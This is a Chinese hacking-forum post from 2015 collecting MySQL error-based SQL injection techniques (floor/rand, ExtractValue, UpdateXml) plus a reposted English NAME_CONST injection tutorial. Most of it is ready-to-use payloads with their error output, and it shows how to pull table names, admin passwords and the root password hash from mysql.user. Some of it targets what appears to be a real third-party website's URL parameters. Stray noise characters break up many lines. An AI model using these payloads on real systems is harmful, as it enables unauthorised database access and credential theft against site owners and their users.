找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3164|回复: 0
打印 上一主题 下一主题

mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2015-11-11 19:03:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

1、通过floor报错

可以通过如下一些利用代码

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

举例如下:
0 m* T: U' ]9 Z3 N首先进行正常查询:

mysql> select * from article where id = 1;
: L, S! f2 ^; a1 _: ^! }0 k! y( |; @+—-+——-+———+
) s. P0 C2 n2 u: w* e| id | title | content |
2 g& i- y, H! {' Z# D+—-+——-+———+
( O* ^6 W$ J, e$ h1 Q! E* t$ T|  1 | test  | do it   |
& {. |% D# _7 F3 ^! b+—-+——-+———+

假如id输入存在注入的话,可以通过如下语句进行报错。

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
+ k- u' r& X" i: lERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’

可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
" Z+ P/ v4 G% R7 {1 F* r例如我们需要查询管理员用户名和密码:

Method1:

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);8 e! b7 f1 V) g. f+ O# x
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

Method2:

mysql> select * from article where id = 1 and (select count(*)  from (select 1 union   select null union   select !1)x group by  concat((select pass from admin limit 1),floor(rand(0)*2)));4 k5 j" |4 [7 Z/ h
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’

2、ExtractValue
1 j" j2 o$ V: U3 P3 ?! }测试语句如下

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

实际测试过程

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–, H' M) x' \% Q- {6 W6 _
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′

3、UpdateXml

测试语句

and 1=(updatexml(1,concat(0x3a,(select user())),1))

实际测试过程

mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’


; |1 |) n- @. _
, ^" x; F6 ^2 M- \( d

再收集:


+ X, w6 @, _; ~! Shttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) ) U$ b0 _% Z$ ?* X5 U

: E3 b/ b' |( |* {Erroruplicate column name ‘5.0.27-community-nt’Erroruplicate column name ‘5.0.27-community-nt’. H9 j) Q* Q$ w
4 Z: Q! F2 F% {# V
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
% ]5 j$ ^9 k, M! t% t/ d* e- ~% c6 o8 u3 Y% l
Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Erroruplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 3 P* y- p9 n. a0 ]
, ~' q) E  ~6 H* g8 e7 s( M# l
MYSQL高版本报错注入技巧-利用NAME_CONST注入# T0 B  O- M# ?# n8 o" x1 J0 k  t
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. + e& L5 g  V# z) [9 p9 v0 p
- x% O% m2 N1 R, D( l; k
/ v8 H+ e5 h/ L9 K  L5 n- ^. J
相关信息
3 \- j* J+ G+ Z4 Y' g8 `
9 g8 s* A. f9 J1 dNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
/ U7 ?+ }; n8 e3 a* I! s% M5 t
. P& t2 C+ a  A  O) N3 q2 |& I$ F  BCode:
6 T- ]9 p, i5 [7 xNAME_CONST(DATA, VALUE)
' P  X, D- q8 |* R, t0 ~
0 a! w' M' T4 e& N' U1 F: MReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.5 g8 Q( ^2 ~; e1 o0 d! v+ S

8 E9 a2 Y9 w" [9 KSELECT NAME_CONST('TEST', 1)& [/ @- c( e% K% }8 |3 p8 ^% M

2 e' W5 }4 {& q5 Q, ]3 b
: g- @9 X" U% }) I- t0 u' q" D: O. t1 R3 w* J; }8 w( g+ v; d
|---------------|
: O. G! {- C3 s, y( L|     TEST      |
+ l. X3 b" [. _, [; k9 C|               |* I/ }9 J( |, Z' }& }0 T
|---------------|
) e7 g, L1 p. m7 F  {|       1       |, c$ p( S4 s! k! x
|               |
% e9 k& P; l& G|---------------|# l2 y, ^$ Q1 c8 }0 o
  R& B8 Q1 U6 X5 X" _% S& q
' a! z0 B/ G" E: X$ O4 O' Q; n' I& v

1 L! _( g; T: ^7 }2 E! W; w
  b! O( w" J! v) @4 Y' w/ H+ dhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const/ f: Z7 m9 M3 t1 P- t5 F0 R( V( n
Intro to MySQL Variables) N- ]8 o/ Z/ I$ k- I. H: l+ j
; y$ p% m4 ~2 z+ c* n- P- X1 L
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.6 v' T, b! r! N# @2 y1 Q9 N
6 g6 J% w7 R- t* u" J
Code:
9 D6 ^. Q0 i1 c) D0 c2 A/ Khttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261/ i3 c+ b. w4 G" `+ A

2 @; n( ?4 }) c  w
1 X4 p  J* P9 M% j  N, U2 C
1 |6 l/ _$ R7 |" f0 `8 g1 m3 z
2 v4 N. V( c% n, t  c/ N
3 j9 H& v0 k0 ^
Code:+ ^# G$ o6 o" J; a9 t: [
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--% F2 d. U0 c: \2 U

, }1 H! r4 E9 r- g* F1 l, {* \  B
( v1 T( A, d. h4 P. C: lVAR = Your MySQL variable.8 m# i+ P4 p' x  G% i) L, W

: N) a. L" S0 D. E/ U+ z7 j1 aMySQL 5.1.3 Server System Variables
% L, l0 c1 h# I
. R( s: t( g" E# N) `Let's try it out on my site..; k5 ?& }3 R/ _, B2 @% [% [' f1 |

- H$ [7 H, ]( n& I9 yCode:
+ Z" B" X  D' l: T8 e* u! f6 S5 b( W# qhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
6 D% ~& P% Y$ a% D% Z/ U
0 w, a, Q# D! w$ D$ q1 ^( G4 OErroruplicate column name '5.0.27-community-nt'
; x" Z  B$ w# y, W. ^- g) ~
1 c+ b2 E2 r7 w# y! D
# i' `$ Q+ A, U% {9 U
! s% q& @& ?" \
( E$ Q0 z. G7 Q, j" a" @5 o- W! O+ [' f
, t3 C* ?9 W% t
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...5 ^7 ~4 [9 O+ S5 I% W& M
$ `! a/ n3 j  \6 R: m9 t4 k5 j
Data Extraction; _# M, @- p/ x" k

: v! w' J/ Z* Z6 \1 H: x/ r  BCode:
' R* V  ~  L0 {) h& h+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
+ R+ x6 c5 t: n$ r

5 {1 f# m4 d/ z5 B; u9 Y
$ ^- f8 A0 @" J- B- PWe should get a duplicate column 1 error...$ Y  v! r2 e+ e# w9 W
; y+ Y) U4 i* C% \) D
Code:
# n, q/ U# G5 ^9 b+ Bhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
: z* `2 B* g1 A. Z" R; O4 c+ y! E+ d
2 K- o) l. A* S' ?0 `. m2 GErroruplicate column name '1" E9 ]. ~7 \8 S  O9 E, x

$ s0 ~9 z6 O" B! i# Q: ?
4 y: n0 G! e7 t
" Z8 W/ `/ \4 v
1 p7 b  A5 j6 a

( U$ Z2 h" W: n9 ]4 [$ y+ t8 C: A7 g% w+ M& M9 g
Now let's get the tables out this bitch..$ f5 A' D/ T3 L  e' \
. u; `! r7 K* J) W" [1 d( `$ M
Code:
! y- W, H8 z1 Z8 o2 C" d/ u# \+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
" V% ?7 t3 X& `% a

) O3 W3 M, h8 x& }6 X/ N9 J; B; T4 d3 P2 l; ]. `4 K
Let's see if it works here, if it does, we can go on and finish the job.- {0 Z" I' h# g8 R  |

; ~* S% `' O) XCode:$ M3 W+ G% f8 v8 @) o8 z
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
! F* H: Y. \, M# `/ }, N
+ H7 J! k4 I, o: v. H& i! }0 ~% E+ ]% }+ Z2 R$ k( v
Erroruplicate column name 'com_admanage7 o/ [  x% ?; J  J2 V, |
1 i0 n2 K" o0 J  l" l9 @% }
# @# x7 i7 q. k7 R1 I6 ]! R

: @8 z4 V4 F" K2 _
2 a0 h! W0 h# N2 }: j& T' O
3 ^9 y' ?; o( S' `9 z2 C) s

/ u" P* q( J* F6 e! FNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
4 n1 b' [; H+ }) X1 N  K) I
! M2 E9 K) W+ ]Let's get the columns out of the user table..0 g( C$ f) F' s6 m5 n" q

- P. ?$ s+ [) Z$ n; C( kCode:7 m0 m, V6 r; V
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
2 \0 @, \# b) g" W) ?2 {3 U

5 q& ^$ r6 }0 v
9 b0 L! X  w2 d1 @9 O4 y; o  W+ iSo mine looks like this, and I get the duplicate column name 'Host'.
% c, C+ S2 s/ N: o1 u3 @* c' u( Q, l& Y  ^( y3 @! T
Code:
- U5 v9 H7 k3 `8 _  n* {http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
4 ^! B, J7 F' r0 K& O& f( q# [/ u+ I- C7 Z2 a* P, n2 K6 s) V
Erroruplicate column name 'Host'% @. g8 b: f# S+ b7 R2 [

1 O# S2 N* a* A$ g! v
4 {, x! {7 M  e) S, B/ ^% }6 |0 y/ O  s1 v! Z6 s2 G/ z3 m8 e* R
* X( I" V3 m$ c6 q) t, m: W% {1 D& w; T
) N$ y: v2 P1 U) o& Q# ?4 Q& H: f

$ J8 Z; R( |% \3 e/ a+ m1 p: K$ X9 ]Woot, time to finish this bitch off.. K. b/ ^5 @5 Z# S0 A3 D

) C' X6 J/ g$ c, Q' rCode:8 H1 Q3 h8 ?1 L' f' Q
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--. a3 {3 l8 n1 R+ m) B

4 p5 d& I9 c; r* a4 h6 Q( S: g$ g! H5 K' I
So mine looks like this...
# d6 v  y! y7 }+ r- x6 k7 c1 O* o% I. P
Code:8 |# A, L  n) k
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
4 m1 U2 f, B$ ?* j& k0 |/ _" d
8 P" @; L. @0 b" v+ ~7 zErroruplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
. g  }8 s- G% s& l2 d8 }' N+ ]
' i5 |. I' [. C. K/ H2 b5 O  p, k
7 N) J/ _+ j" |" C
, O7 @5 c# q( [( H
5 P2 R0 G% r% X% p

7 b5 E; x* T$ ?/ {# c' E) x$ ?. C3 m
And there we have it, thanks for reading.

  B! F" }4 D& Q3 Y! p) b* L% n% x8 n+ B1 S5 d( ]& d6 R' G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表